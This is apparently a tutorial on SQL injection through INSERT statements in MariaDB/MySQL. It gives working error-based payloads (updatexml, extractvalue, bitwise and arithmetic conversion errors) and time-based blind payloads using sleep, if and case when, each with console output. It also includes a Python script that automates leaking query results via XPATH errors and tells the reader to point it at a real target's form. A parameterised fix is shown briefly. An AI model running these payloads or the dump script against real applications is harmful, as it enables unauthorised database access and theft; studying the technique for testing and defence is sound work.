[SQL injection] INSERT error-based injection and time-based blind injection

The trick of INSERT injection lies in how you close the quoting inside a single field value: the payload has to keep the whole statement syntactically valid while smuggling an expression into that one field.

INSERT error-based injection

Table used in the demonstration:

MariaDB [mysql]> desc test;
+--------+----------+------+-----+---------+-------+
| Field  | Type     | Null | Key | Default | Extra |
+--------+----------+------+-----+---------+-------+
| id     | int(10)  | YES  |     | NULL    |       |
| uname  | char(10) | YES  |     | NULL    |       |
| passwd | char(10) | YES  |     | NULL    |       |
+--------+----------+------+-----+---------+-------+

0x01: INSERT numeric error-based injection (the id value is unquoted, so the expression is simply appended with and)

MariaDB [mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

0x02: INSERT string error-based injection

Hint: for a string field the key is closing the quote inside the field value. The payload opens with 2' to terminate the application's opening quote and ends with and ' so that the application's own closing quote completes the expression.

MariaDB [mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1)  and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

0x03: Using extractvalue in place of updatexml (both raise the XPath error only while the argument is not valid XPath, and the error text shows at most 32 characters of it, so longer results have to be paged through with substr())

MariaDB [mysql]> insert into test values(1,'2' and extractvalue(1,concat(0x7e,database()))  and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql'

0x04: Using bitwise operators for INSERT numeric error-based injection

The error arises because 1 is bitwise-combined with the result of (select database()): the string 'mysql' must first be converted to an integer, the conversion is "truncated", and the server reports the offending value in the message. In a plain SELECT this would only be a warning; inside an INSERT running under strict SQL mode (STRICT_TRANS_TABLES, the default on current MySQL and MariaDB) the conversion warning is promoted to error 1292, which is what leaks the value. &, | and ^ all behave the same way.

For details of the bitwise operators see this link.

MariaDB [mysql]> insert into test values(1 ^ (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

MariaDB [mysql]> insert into test values(1 | (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

MariaDB [mysql]> insert into test values(1 & (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

0x05: Using bitwise operators for INSERT string error-based injection

MariaDB [mysql]> insert into test values(1,'1' & (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

0x06: Using arithmetic operators (+, -, %, /) to trigger an INSERT error. Arithmetic converts the string to a DOUBLE rather than an INTEGER, hence the different message; bitwise, logical and arithmetic operators can be mixed freely to get past whatever a filter blocks.

MariaDB [mysql]> insert into test values(1,'1' + (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' - (select database()) and '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' / (select database()) or '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) | '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) / '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'
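The payloads above are typed by hand one at a time. As an added example (not code from the original post), the following Python shows the application side that makes them work and automates the updatexml leak. Everything about the application is assumed: a hypothetical form with three fields interpolated straight into the page's INSERT (vulnerable_insert), its parameterised replacement (hardened_insert), and a constructed stand-in for the MariaDB server (fake_send, SECRET) so the script runs offline. The only page-level facts it relies on are the '2' and updatexml(...) and '' closure and the 32-character cap on the XPATH error text.

```python
import re

# Assumed (not in the original): a web application takes three form fields and
# builds the page's INSERT by string interpolation. This is the injectable form.
def vulnerable_insert(uid, uname, passwd):
    return "insert into test values(%s,'%s','%s')" % (uid, uname, passwd)

# The fix: the SQL text stays constant and the values travel as parameters. The
# returned tuple is what you hand to cursor.execute() in any DB-API driver;
# nothing the attacker types can change the statement's structure.
def hardened_insert(uid, uname, passwd):
    return "insert into test values(%s,%s,%s)", (uid, uname, passwd)

# An XPATH syntax error echoes at most 32 characters of the bad expression.
# Two are spent on the ~ markers, so each request can leak 30 characters.
WINDOW = 30

def updatexml_payload(expr, offset=1):
    """Value typed into the quoted uname field: opens with 2', ends with and '
    so the application's own closing quote completes the statement."""
    chunk = "substr((%s),%d,%d)" % (expr, offset, WINDOW)
    return "2' and updatexml(1,concat(0x7e,%s,0x7e),1) and '" % chunk

XPATH_ERR = re.compile(r"XPATH syntax error: '~(.*)~'")

def leak_from_error(error_text):
    """Pull the text between the ~ markers out of a MariaDB error message."""
    m = XPATH_ERR.search(error_text)
    return None if m is None else m.group(1)

def dump_via_error(expr, send):
    """Leak the full result of `expr`, 30 characters per request.
    `send(sql)` must return the server's response text for the statement."""
    out, offset = "", 1
    while True:
        sql = vulnerable_insert(1, updatexml_payload(expr, offset), "3")
        chunk = leak_from_error(send(sql))
        if chunk is None:
            raise RuntimeError("no XPATH error in response; injection point not confirmed")
        out += chunk
        if len(chunk) < WINDOW:      # a short (or empty) window means we hit the end
            return out
        offset += WINDOW

# Constructed stand-in for the database server, used only so this runs offline:
# it reads the substr() window out of the statement and answers with the error
# text MariaDB would raise. SECRET imitates a group_concat(table_name) result.
SECRET = "column_stats,columns_priv,db,event,func,general_log"
_WINDOW_RE = re.compile(r"substr\(\(.*?\),(\d+),(\d+)\)")

def fake_send(sql):
    m = _WINDOW_RE.search(sql)
    if m is None:
        return "Query OK, 1 row affected"
    start, length = int(m.group(1)) - 1, int(m.group(2))
    return "ERROR 1105 (HY000): XPATH syntax error: '~%s~'" % SECRET[start:start + length]

TABLES = ("select group_concat(table_name) from information_schema.tables "
          "where table_schema=database()")

if __name__ == "__main__":
    print(vulnerable_insert(1, updatexml_payload("database()"), "3"))
    print(dump_via_error(TABLES, fake_send))
```

Against a real target, replace fake_send with a function that submits the form and returns the response body; dump_via_error stops as soon as a window comes back shorter than 30 characters, so a result whose length is an exact multiple of 30 costs one extra request that returns an empty window.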

INSERT time-based blind injection

Before studying time-based blind injection you should be comfortable with sleep(), if(), substr(), ascii() and case when in SQL.

0x07: A simple example

The original, legitimate statement:
MariaDB [mysql]> insert into test values(1,('2'),'3');
Query OK, 1 row affected (0.005 sec)

MariaDB [mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');
Query OK, 1 row affected, 1 warning (3.002 sec)

Note that the row is still written: uname receives the result of the boolean expression (0) rather than '1', so every probe leaves a junk row in the table, and because and short-circuits, sleep() only runs when the value in front of it is true.

0x08: Guessing the length of the current database name: if the length equals 5, the statement is delayed by 3 seconds.

MariaDB [mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.007 sec)

0x09: Guessing the ASCII code of the first character of the first table name in the current database. Take your time with this one; slow is fast.

The actual value:
MariaDB [mysql]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
|                                                                                                           112 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

The same check as an INSERT blind injection:
MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.005 sec)

0x10: Using case when in place of if():

MariaDB [mysql]> insert into test values(1,('2') and case when (select length(database())) = 5 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.002 sec)

MariaDB [mysql]> insert into test values(1,('2') and case when ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 112 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.004 sec)

Once you have mastered the above, you have the essentials of INSERT error-based and blind injection.